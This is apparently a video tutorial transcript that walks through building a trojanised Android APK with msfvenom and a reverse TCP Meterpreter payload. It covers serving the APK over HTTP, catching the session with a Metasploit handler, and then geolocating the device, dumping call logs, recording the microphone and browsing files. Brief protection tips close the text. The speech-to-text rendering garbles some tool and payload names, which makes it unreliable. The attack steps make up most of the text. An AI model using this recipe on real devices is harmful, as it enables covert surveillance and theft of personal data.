This channel does not promote or encourage any illegal activities. All contents provided by this channel is meant for educational purpose only.
What if I told you that right now, someone could be secretly listening to your conversations, reading your messages, and tracking your location through your smartphone? And what if I told you that this could all be happening through an app that looks completely legitimate? In this video, I'm going to show you exactly how attackers gain full control over an Android device without the target's knowledge, and more importantly, how you can protect yourself from these attacks. So if you guys enjoyed this video, make sure you hit that like, subscribe, and notification bell so you don't miss out on any future content. And as always, if you have any questions or need any help, please leave me a message in the comments below and I will get back to you. Let's begin by setting up our testing environment. For this, we'll need two main components: Genymotion for our Android virtual device and a Kali Linux machine for our testing platform. Let's start with Genymotion. Open your web browser and in the search bar type Genymotion. Click on the first official website that appears. Now scroll down till you see a button labeled Get Started for Genymotion Desktop. Click on it. The download will begin automatically. While we're waiting, let me explain why we're using Genymotion. Genymotion provides superior performance and networking capabilities, which are essential for the kind of security testing we'll be doing today. Once the download is complete, double-click on the installer file. Follow the installation wizard. There's nothing tricky here. Just keep clicking next until the installation begins. One important note, you'll need to restart your computer after the installation completes. This is crucial for Genymotion to work properly. After restarting your computer, locate and click the Genymotion icon on your desktop. When you first launch Genymotion, you'll need to create an account. I'm going to skip the account creation process in this video since you can follow the standard registration steps, but make sure you complete this step before moving forward. Once you've logged in, you'll see a screen asking you to select between personal use and business use. Since we're using the free version, select personal use. Click Next. Now we're at the main Genymotion interface. To create a virtual Android device, look for the plus button at the top of the window. Click it and you'll see a list of available Android versions. The version isn't crucial for our demonstration, but I recommend choosing a recent one for better compatibility. You can customize the CPU and memory settings, but for our purposes, the default settings work just fine. Click Next and then install. This process might take a few minutes depending on your internet speed. While that's installing, let me explain what we're going to do next. Our goal is to demonstrate how attackers create a malicious version of a legitimate app. We'll take a real app and bind it with malicious code that gives us remote access to the device. Once Genymotion installation is complete, close it and open VirtualBox. You should see your new Android virtual device listed. Start up and wait until you see the IP management console message. This indicates that our virtual device is ready for use. Now reopen Genymotion and run the emulator. You'll see your virtual Android device spring to life. Now let's switch gears and prepare our attack environment. Open your Kali Linux virtual machine. The first thing we'll need to do is identify our machine's IP address. Type in the command ifconfig and press enter. This command, which stands for interface configuration, shows us all our network interfaces and their associated IP addresses. Make a note of your IP address. You'll see it listed either under IF0 or WLAN0, depending on whether you're using a wired or wireless connection. We'll need this IP address later. Now comes the technical part. We're going to use a tool called MS-Venom to create our malicious APK. MS-Venom is part of the Metasploit framework and is specifically designed for creating payloads. Open a new folder where you want to save the malicious APK and open the terminal there. Type this command in your terminal. We want to start with sudo MS-Venom because we need root privileges for this operation. The platform Android parameter tells MS-Venom we're targeting an Android device. We use Java because Android apps run on Java architecture. The P flag specifies our payload, which is Android/interpreter/reverse_TCP. This payload will create a connection back to our machine when the app is launched. The O parameter specifies where we want to save our malicious APK. Finally, we set our L host to our Kali Linux machine's IP address and L port to 4444, which is a commonly used port for testing. Press enter and wait for MS-Venom to generate the malicious APK. This might take a moment. While this is happening, let me explain what's going on behind the scenes. MS-Venom is creating an Android application package or APK that contains our payload code. This payload is designed to establish a secure connection back to our attacking machine. Once the process completes, verify that our payload APK was created by typing ls in the terminal. You should see my app file in the directory listing. Now we need to make our payload accessible to our virtual Android device. We'll do this by setting up a simple web server using Python. Type Python 3 in HTTP server 80 and press enter. This command starts a basic HTTP server on port 80, making all files in our current directory accessible via web browser. Now that our web server is running, switch over to your Android virtual device, open the browser, and enter the IP address of your Kali Linux machine. You might see some warnings about downloading from unknown sources. In a real device, these warnings are actually important security features, but for our demonstration, we'll proceed with the installation. Once the APK is installed, click Done, but don't open the app yet. We need to set up our listener first. We're going to use the Metasploit Framework console. Type MSF console and press enter. This might take a moment to load, as Metasploit is a comprehensive framework with many features. Once Metasploit loads, we need to configure our handler. Type use exploit /multi/handler and press enter. This module handles incoming connections from our payload. Next, we need to set our payload to match what we use in MSF Venom. Type set payload Android/interpreter/reverse TCP and press enter. Let's check what options we need to configure. Type show options and press enter. You'll see that lhost isn't set yet, but lport is already set to 4444, the same port that we specified earlier. To set lhost, type set lhost followed by your Kali Linux machine's IP address. Run show options to verify everything is configured correctly. Now comes the exciting part. Type run and press enter. This starts our handler, which will wait for the target device to connect. Switch back to your Android virtual device and open the app. Watch your Metasploit console closely. Within moments, you should see a message indicating that the interpreter session has been established. This means that we now have a connection to the target device. Let's explore what we can do with this connection. At the interpreter prompt, type sysinfo and press enter. This shows us detailed information about the compromised device, including its Android version and hardware details. Next, type get UID to see which user account we're running under. If you type help, it will show all the commands you can execute. You can check the complete list, which includes even more powerful commands. Now we can try some of these powerful commands. Want to know if your device is rooted? Type check_root and press enter. But here's where it gets really interesting. Type geolocate to get the device's physical location. Think of the implications of this. An attacker could track someone's movements without their knowledge. Next, type dump_call log to extract the device's call history. All this information gets saved to a file that we can examine later. We can even access the device's cameras. Type webcam_list to see the available cameras. You'll typically see both front and back cameras listed. One of the most invasive capabilities is audio recording. Type record_mic D10 to record 10 seconds of audio through the device's microphone. The victim would have no idea this is happening. Let's explore the file system. Type ls to list files. Type pwd to see our current directory, and cd to navigate between directories. These basic Linux commands gives us complete access to browse through the device's storage. So how do we protect ourselves from these types of attacks? Here are 5 essential steps that every Android user should take. First, and most importantly, never install apps from unknown sources. The Google Play Store, while not perfect, has sophisticated security measures to detect malicious apps. Third-party app stores and direct downloads are much riskier. If a simple app requests access to your camera, microphone, or location, ask yourself why it needs these permissions. Don't just click allow without thinking. Next, keep your device updated. Many attacks exploit known vulnerabilities that are fixed in newer versions of Android. Those update notifications might be annoying, but they're crucial for security. Be especially wary of modified or cracked versions of popular apps. These are often used to disguise malware because users are tempted by free versions of paid apps. Lastly, monitor your device for unusual behavior. If your battery is draining unusually quickly or you notice unexpected data usage, these could be signs signs of malicious activity. Regular security audits are important. If you guys enjoyed that video, make sure you hit the like, subscribe, and notification bell so you don't miss out on any future content. And again, if you have any questions, please leave me a message in the comments below and I will get back to you. Thanks for watching, and I will see you in the next video.